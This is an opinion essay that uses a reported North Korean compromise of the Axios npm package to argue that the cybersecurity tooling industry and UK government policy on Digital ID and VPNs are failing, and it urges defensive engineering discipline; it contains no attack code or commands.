The wartime governments of the Second World War are remembered, in part, for their failures of imagination — for not seeing what was coming until it had already arrived. But at least when the threat did become undeniable, they built air raid shelters. They installed anti-aircraft batteries. They met the visible danger with visible countermeasures.

We are living through the opening phase of a different kind of war, and our governments are spending billions on digital ID schemes while the bombs are already falling. They just don't make a sound when they land.

This week, North Korean state-sponsored hackers turned the Axios npm package — downloaded over 100 million times per week — into a credential-stealing malware delivery vehicle. Two backdoored versions were silently published to the npm registry just after midnight UTC, targeting Windows, macOS, and Linux simultaneously, with no user interaction required. The attack window lasted three hours. Then the payload was delivered, the malware reached out to a command-and-control server, deployed additional payloads, and wiped its own tracks.

This is not a novel threat. This is not an unprecedented technique. In recent years, attackers have compromised SolarWinds, Kaseya, 3CX, Log4j, and Polyfill.io using the same fundamental playbook: compromise a trusted package, poison the well, watch the infections cascade downstream. And yet here we are again. Same method. Different package. Bigger blast radius.

The cybersecurity industry has had a decade and a half of investment, consolidation, and exponential revenue growth to fix this. It hasn't. The question we need to stop avoiding is: why?

$262B
Global cybersecurity market size in 2025
$10.5T
Annual cost of cybercrime in 2025
3hrs
Window of the Axios supply chain attack

The Core Indictment

Industry Revenue vs. Cost of Cybercrime (2015–2025)

Cybersecurity spend has grown at double-digit CAGR every year. The cost of cybercrime has grown faster. The industry is not solving the problem. It is scaling alongside it.

Sources: Statista, McKinsey, Cybercrime Magazine / Cybersecurity Ventures. Cybercrime cost figures represent total global damage including ransomware, IP theft, financial fraud, and recovery costs.

The Tool Trap

I've worked with or alongside AlertLogic, WhiteHat, and BlackDuck. I've seen teams integrate Snyk, SonarQube, Dependabot, and every flavour of SAST/DAST scanner the market offers. I've watched those tools get adopted as a solution rather than a complement. I've watched the underlying engineering discipline quietly atrophy as organisations outsourced their security conscience to a dashboard.

Tooling is not a security posture. It is a comfort posture.

Scanners find known patterns in known packages against known CVEs. State-sponsored actors building novel supply chain attacks — pre-staging a fake dependency for days before the strike, compromising a maintainer account through a separate vector, deploying platform-specific payloads with forensic self-destruction — don't show up in your scanner's database until after the fact. The level of operational sophistication in the Axios attack included compromised maintainer credentials, pre-staged payloads built for three operating systems, both release branches hit in under 40 minutes, and built-in forensic self-destruction. Your CI pipeline's Snyk step would have told you everything was fine.

Worse, the tools themselves have become an attack surface. The Trivy supply chain compromise demonstrated exactly this: a security scanner used as a delivery mechanism. The very thing you deploy to detect threats introducing one. When your security tooling requires its own threat model, you have a structural problem, not a tooling problem.

The Supply Chain Epidemic

Major Supply Chain Incidents (2013–2025)

Each bar represents the approximate number of significant documented supply chain compromises per year. The trend is not improving. It is accelerating.

Based on publicly documented incidents tracked by CISA, ENISA, and security research firms. Figures are conservative — many incidents go unreported or undiscovered.

The Responsibility Vacuum

Security vendors sell you confidence. They do not share your liability. When the Axios maintainer account was compromised and malicious packages shipped to your production pipeline, your Snyk subscription did not trigger a breach notification to your customers. Your SonarQube instance did not appear before your regulator. You did.

This asymmetry is at the rot of the industry. Vendors monetise the fear and capture the recurring revenue. They do not carry the consequence. That stays with you and your team — as it always has. The question is whether you've structured your engineering culture and practices to match that responsibility, or whether you've offloaded accountability to a set of third-party dashboards and assumed the coverage was real.

The cybersecurity industry is the only sector in existence where the primary growth driver is the failure of its own product. Every successful attack is, commercially speaking, a sales event. Every breach generates board-level anxiety that converts directly into budget. Every headline about a supply chain compromise is a pipeline opportunity for the vendors who sell supply chain scanning. This is not a conspiracy — it is a structural incentive. And structural incentives shape behaviour at scale whether anyone intends them to or not. The industry does not need to be malicious to be misaligned. It just needs to be rational.

For most organisations, it's the latter. State actors know it. The vendors know it too — they just have no reason to say so.

Back to Basics

The fundamentals that would actually reduce your attack surface aren't purchased from a vendor. They're cultivated. And the place to start is more basic than most security frameworks acknowledge: does the developer writing this code understand what data they're accepting, from whom, in what form, and under what constraints?

Regex is not a footnote. For anyone building systems that accept external input — which is every system — the ability to construct a precise, well-reasoned validation pattern is a direct measure of whether the developer has actually thought about the attack surface. You cannot outsource that reasoning to a library someone else wrote and probably hasn't audited in eighteen months. You have to hold it in your head. That is what it means to code with security as a first principle rather than a retrofit. A developer who reaches for a validation library before they can articulate what valid input looks like has already lost the argument.

🔗
Minimise Your Dependency Graph

Every dependency is a trust relationship with a human maintainer, their account security, their access token hygiene, and their geopolitical exposure. Axios is embedded in 80% of cloud environments. That's a monoculture — exactly what this attack exploited.

🔒
Lock Your Boxes Down

Principle of least privilege is not a compliance checkbox. If your runtime has no business making outbound connections to unknown hosts, the exfiltration step fails. Egress filtering is not exotic. It is basic. The Axios malware needed to phone home to deliver its payload.

👩‍💻
Make Developers Responsible

Not the security team. Not the tooling vendor. The developer who pulled in the dependency. Security culture cannot be delegated to a specialist function who sits outside the team and runs scans after the fact. It has to be embedded in the people who write the code.

📋
Audit Your Postinstall Scripts

The Axios attack weaponised a postinstall hook that executes automatically on every npm install. If your team cannot answer what runs in your dependency install chain, you do not have a dependency graph. You have a trust fall with anonymous maintainers worldwide.

The AI Accelerant

There's a new variable in this equation and the industry hasn't processed it honestly yet.

The Axios attack was described by security researchers as "perfectly timed" given the rise of AI agents developing software at organisations without any review or guardrails. That framing is polite. The reality is sharper.

AI coding assistants — and I say this as someone who uses them — have been trained on the publicly available corpus of human-written code. That corpus includes fifteen years of npm packages with postinstall scripts that do things they shouldn't. It includes Stack Overflow answers that solve the immediate problem and introduce a subtler one. AI agents don't independently derive secure patterns. They statistically reproduce the patterns they've seen most frequently. In a world where insecure patterns are common, AI code generation produces insecure code — confidently, fluently, and at velocity.

The cost of producing code is collapsing. The complexity of the attack surface is not. That gap is where the next decade of breaches will live.

AI assistance in engineering is now table stakes. Teams that use it effectively will outpace those that don't. But "effectively" requires highly skilled developers with a sufficiently wide range of expertise to recognise when the generated output is insecure. That bar hasn't lowered. If anything, it's risen. You need someone who can look at a postinstall script in a package.json and feel the wrongness of it instinctively — not someone who accepted the AI suggestion without reading it.

The Geopolitical Reality

This is not criminal opportunism. This is a sustained, state-directed campaign. Experts expect a long-term effort to steal cryptocurrency to fund the North Korean regime, which channels such funds toward its nuclear and missile programmes. Last year, North Korean actors stole $1.5 billion in cryptocurrency in a single attack — the largest crypto heist on record at the time.

But zoom out further. We are in a period of active geopolitical realignment, contested alliances, and multiple state actors with significant cyber capabilities and increasing motivation to deploy them against western infrastructure. The capabilities of western intelligence services are documented — WikiLeaks gave us a partial inventory. We should therefore assume adversaries have reached comparable capability through their own means. The era of asymmetric advantage is over.

And cyber attacks have a property that rockets and bombs do not: they can be denied, graduated, and sustained below the threshold of conventional military response. They target economic infrastructure — payments, logistics, supply chains, energy — without a single bullet being fired.

We don't have to hypothesise about what this looks like in practice. The M&S attack in April 2025 — carried out not through some exotic zero-day, but through social engineering at an IT helpdesk — forced the retailer to revert to pen-and-paper stock management. Shelves went bare. Online clothing sales were suspended for 46 days. The financial toll: approximately £300 million in lost profit. Statutory pre-tax profit collapsed from £391.9m the previous year to £3.4m in the six months following the attack. Market capitalisation dropped by over £700 million within days of disclosure.

Consumer spending fell 22% at M&S during the disruption. The same weekend saw Harrods and Co-op also targeted, with rural areas that rely on Co-op experiencing notable supply shortages. This is one retailer. One attack. Now project that across energy, water, payment rails, and logistics infrastructure — at a time when recession fears are already suppressing consumer confidence and geopolitical tension is already moving markets. The economic cascade from coordinated attacks on critical sectors would not be contained by cyber insurance payouts and half-year recovery plans.

The Real Cost

Financial Impact of Major Cyber Incidents (Selected, USD equivalent)

These are not edge cases. They are the documented cost of the status quo. Each incident is a data point in a trend that the industry's growth has not reversed.

Costs include incident response, lost revenue, recovery, regulatory fines, and market cap impact where applicable. Sources: Company filings, SEC disclosures, published breach reports.

Where Government Is Failing

The response from government has been characteristically misaligned with the actual threat. Two policy trajectories in particular represent not just a failure of prioritisation, but an active worsening of the UK's security posture. Both deserve naming directly.

The Digital ID Gamble

The government is building a mandatory national Digital ID system on foundations that its own senior engineers have described as not fit for purpose — and spending somewhere between £400 million and £1.8 billion to do it, depending on which estimate you believe, since ministers have declined to give Parliament a straight answer on cost.

The scheme, announced by Prime Minister Starmer in September 2025, will use GOV.UK One Login as its backbone — a system already used by 13 million people to access pensions, passport services, and professional registrations. In December 2025, senior civil servants with direct knowledge of the programme went to ITV News as whistleblowers, backed by confidential internal documents. What they described was alarming. One Login is failing to meet the government's own mandatory cybersecurity standards — both the Secure by Design framework and the NCSC's Cyber Assessment Framework. Development work was outsourced to Romania without senior approval or consultation with cybersecurity experts. System administrators were using unsecured devices, creating a potential pipeline from the public internet to the system's most sensitive components. And during a formal red team exercise earlier in the year, a remote attacker successfully introduced malware onto a system administrator device and gained access to sensitive areas of One Login — without triggering a single monitoring alert.

"We don't know if the system has been compromised or not, but we have proved it can be compromised. That would shut everybody out — pensions, welfare, passports, driving licences. Everything." — One Login whistleblower, ITV News

The NCSC — the body that should be the primary voice on this — identified in its own assessment that a successful compromise of One Login could result in bulk personal data theft, identity fraud, economic damage, and the exposure of people in witness protection. The documents cited by the whistleblowers showed that internal investigators concluded the programme was carrying a "high level of risk." The government's response was to proceed anyway.

Graeme Stewart at Check Point described the scheme as a honeypot for cybercriminals: a central database of 50 million+ records representing a single, high-value, high-prestige target for exactly the kind of state actor we discussed earlier in this piece. Security experts across the industry have called the scheme a catastrophe in waiting. Nearly three million people signed a petition calling for it to be abandoned. Cross-party political opposition has been consistent and vocal. The security community has been clear and unified. Government has pressed on regardless — spending up to £1.8 billion on infrastructure its own red team has already demonstrated can be penetrated undetected.

Ofcom, VPNs, and the Vilification of Security Tools

The second failure is Ofcom, and it cuts closer to the engineering community's daily reality.

The Online Safety Act, which came into force in July 2025, requires age verification for a sweeping range of online platforms. Its implementation has been widely criticised as technically incoherent — it mandates scanning of end-to-end encrypted messaging for child abuse content, despite expert consensus that this is not possible without destroying the encryption that makes those tools secure. It creates new requirements for biometric and government ID submission to private companies with no meaningful oversight of how that data is then handled.

Predictably, VPN usage in the UK surged by over 1,400% in the hours after the Act came into force. Ofcom's response was not to acknowledge the scale of public mistrust in the age verification framework. It was to begin covertly monitoring VPN adoption using an undisclosed third-party tool — the identity of which Ofcom initially refused to reveal even under Freedom of Information requests — and to allow government ministers to openly discuss whether VPNs should be banned or age-gated.

Let that land for a moment. VPNs are a foundational security tool. They protect journalists, whistleblowers, remote workers, security researchers, and ordinary people using public Wi-Fi. They are the same tooling your enterprise security team mandates for remote access. The suggestion that VPNs should be banned or restricted in the UK places us, as Graeme Stewart at Check Point put it, "in the company of China, Russia, and Iran. That should tell you everything."

This is a communications regulator, led by people with limited technical background in security infrastructure, making policy recommendations that directly undermine defensive security practice — at a time when state-level threat actors are actively exploiting every vulnerability in our software supply chain. The NCSC exists precisely to provide technically grounded national security guidance on digital infrastructure. It should be the lead voice on all of this. Instead, a regulator whose primary expertise is broadcast media and telecoms licensing is shaping the UK's relationship with the most important privacy and security tool available to ordinary internet users.

The conflict is stark: on one hand, government is building a centralised identity system that concentrates the personal data of the entire adult population into a single attack surface. On the other, it is considering restricting the very tools that individuals and organisations use to protect their communications and data from exactly the kind of adversaries that system will attract. It is as if the wartime government had not only failed to build the air raid shelters — it had begun dismantling the ones already standing.

The prevailing political approach to cyber security oscillates between compliance theatre, post-incident inquiry, and technically uninformed regulation that creates new vulnerabilities while appearing to address old ones. Frameworks are written. Audits are scheduled. Tick boxes are filled in. And the adversary iterates at a pace that compliance cycles and communications regulators cannot begin to match.

The bombs aren't visible this time. They won't announce themselves with a siren. They will arrive as a backdoored npm package published at midnight that your automated pipeline pulled and deployed before anyone was awake. They will arrive as a social engineering call to an IT helpdesk. They will arrive as a compromised access token on a long-forgotten CI integration. And they may well arrive through the infrastructure the government has spent a billion pounds building, on the advice of people who were never asked.

What Actually Needs to Change

Stop buying security. Start building it.

Invest in your engineers as if they are the actual defence mechanism — because they are. Pay for the training. Expect the expertise. Create a culture where a developer who raises a security concern is celebrated, not managed around. Pin your dependencies. Audit your postinstall scripts. Treat every outbound network connection from your runtime as a decision that requires justification.

Minimise everything. Every dependency. Every open port. Every permission. Every surface area is a potential vector, and right now, state-level actors are mapping every surface area your organisation exposes.

Code paranoid. Ship minimal. Own the consequence.

The billion-dollar security industry will not save you. They will send you a forensic report after the breach, explain what happened in excellent detail, and bill you for the incident response. The responsibility has always been yours. The tools, the dashboards, the compliance frameworks — none of them change that. It's past time to act like it.